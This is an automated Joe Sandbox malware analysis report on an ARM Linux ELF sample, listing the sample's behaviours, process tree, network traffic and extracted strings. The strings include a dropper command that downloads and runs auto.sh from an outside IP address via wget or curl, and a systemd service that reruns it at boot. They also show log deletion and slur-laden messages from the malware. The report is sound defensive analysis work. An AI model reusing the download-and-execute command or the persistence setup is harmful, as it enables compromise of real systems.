Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm.elf

Overview

General Information

Sample name:arm.elf
Analysis ID:1583073
MD5:6a27b7679be2ee91ee53006b51832210
SHA1:d2c2cd9791002177446ef2548392417ad87b4c9d
SHA256:23815ea03401f17fedc670a93d733f1e62e68cf8a639092d3c53b53c1b4c9f4b
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Deletes system log files
Manipulation of devices in /dev
Sample deletes itself
Sends malformed DNS queries
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583073
Start date and time:2025-01-01 19:26:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/4@54/0

Warnings

  • VT rate limit hit for: tcpdown.suo. [malformed]
  • VT rate limit hit for: tcpdown.su|1

Runtime Messages

Command:/tmp/arm.elf
PID:6233
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:

Process Tree

  • system is lnxubuntu20
  • arm.elf (PID: 6233, Parent: 6158, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.elf
    • arm.elf New Fork (PID: 6237, Parent: 6233)
      • arm.elf New Fork (PID: 6239, Parent: 6237)
        • arm.elf New Fork (PID: 6420, Parent: 6239)
        • arm.elf New Fork (PID: 6422, Parent: 6239)
        • arm.elf New Fork (PID: 6428, Parent: 6239)
        • arm.elf New Fork (PID: 6433, Parent: 6239)
        • arm.elf New Fork (PID: 6442, Parent: 6239)
        • arm.elf New Fork (PID: 6444, Parent: 6239)
        • arm.elf New Fork (PID: 6450, Parent: 6239)
        • arm.elf New Fork (PID: 6455, Parent: 6239)
        • arm.elf New Fork (PID: 6461, Parent: 6239)
        • arm.elf New Fork (PID: 6487, Parent: 6239)
        • arm.elf New Fork (PID: 6490, Parent: 6239)
        • arm.elf New Fork (PID: 6500, Parent: 6239)
        • arm.elf New Fork (PID: 6506, Parent: 6239)
        • arm.elf New Fork (PID: 6513, Parent: 6239)
        • arm.elf New Fork (PID: 6544, Parent: 6239)
        • arm.elf New Fork (PID: 6546, Parent: 6239)
        • arm.elf New Fork (PID: 6557, Parent: 6239)
        • arm.elf New Fork (PID: 6559, Parent: 6239)
        • arm.elf New Fork (PID: 6568, Parent: 6239)
        • arm.elf New Fork (PID: 6571, Parent: 6239)
        • arm.elf New Fork (PID: 6582, Parent: 6239)
        • arm.elf New Fork (PID: 6584, Parent: 6239)
        • arm.elf New Fork (PID: 6593, Parent: 6239)
        • arm.elf New Fork (PID: 6594, Parent: 6239)
        • arm.elf New Fork (PID: 6605, Parent: 6239)
        • arm.elf New Fork (PID: 6607, Parent: 6239)
        • arm.elf New Fork (PID: 6618, Parent: 6239)
        • arm.elf New Fork (PID: 6620, Parent: 6239)
        • arm.elf New Fork (PID: 6630, Parent: 6239)
        • arm.elf New Fork (PID: 6633, Parent: 6239)
        • arm.elf New Fork (PID: 6645, Parent: 6239)
        • arm.elf New Fork (PID: 6649, Parent: 6239)
        • arm.elf New Fork (PID: 6655, Parent: 6239)
        • arm.elf New Fork (PID: 6665, Parent: 6239)
        • arm.elf New Fork (PID: 6667, Parent: 6239)
        • arm.elf New Fork (PID: 6678, Parent: 6239)
        • arm.elf New Fork (PID: 6682, Parent: 6239)
        • arm.elf New Fork (PID: 6693, Parent: 6239)
        • arm.elf New Fork (PID: 6695, Parent: 6239)
      • arm.elf New Fork (PID: 6241, Parent: 6237)
        • arm.elf New Fork (PID: 6245, Parent: 6241)
      • arm.elf New Fork (PID: 6243, Parent: 6237)
      • sh (PID: 6243, Parent: 6237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 6247, Parent: 6243)
        • systemctl (PID: 6247, Parent: 6243, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • arm.elf New Fork (PID: 6262, Parent: 6237)
      • sh (PID: 6262, Parent: 6237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 6264, Parent: 6262)
        • systemctl (PID: 6264, Parent: 6262, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 6249, Parent: 6248)
  • snapd-env-generator (PID: 6249, Parent: 6248, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6266, Parent: 6265)
  • snapd-env-generator (PID: 6266, Parent: 6265, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6280, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 6280, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • systemd New Fork (PID: 6285, Parent: 1)
  • systemd-hostnamed (PID: 6285, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • gdm3 New Fork (PID: 6416, Parent: 1320)
  • Default (PID: 6416, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6417, Parent: 1320)
  • Default (PID: 6417, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: arm.elfAvira: detected
Multi AV Scanner detection for submitted file
Source: arm.elfVirustotal: Detection: 50%Perma Link
Source: arm.elfReversingLabs: Detection: 52%
Source: arm.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: arm.elfString: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/console/var/wwww/etc/systemd/system/startup_command.service[Unit]
Source: arm.elfString: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Networking

barindex
Sends malformed DNS queries
Source: global trafficDNS traffic detected: malformed DNS query: tcpdown.suo. [malformed]
Source: global trafficTCP traffic: 192.168.2.23:45846 -> 45.200.149.96:2601
Source: global trafficTCP traffic: 192.168.2.23:57096 -> 107.175.130.16:7722
Source: /tmp/arm.elf (PID: 6233)Socket: 127.0.0.1:39123Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su|1
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suo. [malformed]
Source: startup_command.service.13.drString found in binary or memory: http://154.216.18.192/auto.sh
Source: arm.elf, startup_command.service.13.drString found in binary or memory: http://154.216.18.192/auto.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/console/var/wwww/etc/systemd/system/startup_command.service[Unit]
Source: Initial sampleString containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6241)SIGKILL sent: pid: 6280, result: successfulJump to behavior
Source: classification engineClassification label: mal72.troj.evad.linELF@0/4@54/0

Data Obfuscation

barindex
Manipulation of devices in /dev
Source: /tmp/arm.elf (PID: 6239)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6280)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6280)Directory: <invalid fd (8)>/..Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6285)Directory: <invalid fd (10)>/..Jump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/6111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/6111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/6111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/6111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/6111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/6111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6241)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6243)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/arm.elf (PID: 6262)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /bin/sh (PID: 6247)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6264)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Deletes system log files
Source: /tmp/arm.elf (PID: 6239)Log files deleted: /var/log/kern.logJump to behavior
Sample deletes itself
Source: /tmp/arm.elf (PID: 6233)File: /tmp/arm.elfJump to behavior
Source: /tmp/arm.elf (PID: 6233)Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6285)Queries kernel information via 'uname': Jump to behavior
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6682.1.00007f1bec034000.00007f1bec045000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_721-4290559889,
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: p$0!/proc/79/cmdline1/tmp/vmware-root_721-4290559889
Source: arm.elf, 6233.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6420.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6422.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6428.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6433.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6442.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6444.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6450.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6455.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6461.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6487.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6490.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6500.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6506.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6513.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6544.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6546.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6557.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmpBinary or memory string: ux86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: V/arm/var/lib/vmware/VGAuthP0/var/lib/vmware/VGAuth/aliasStoreQ
Source: arm.elf, 6682.1.00007f1bec045000.00007f1bec250000.rw-.sdmpBinary or memory string: </var/lib/vmware/VGAuth
Source: arm.elf, 6682.1.00007f1bec034000.00007f1bec045000.rw-.sdmpBinary or memory string: T/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f/tmpX/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj\/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj/tmp$/tmp/vmware-root_721-4290559889\/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-QD4YZh4/tmp/snap.lxd
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: V/arm/var/lib/vmware/VGAuth/aliasStoreP /var/lib/PackageKitQP:
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: P /var/lib/vmwareQ
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6682.1.00007f1bec045000.00007f1bec250000.rw-.sdmpBinary or memory string: /var/lib/vmware4/var/lib/PackageKit
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: V/arm/var/lib/vmwareQ
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
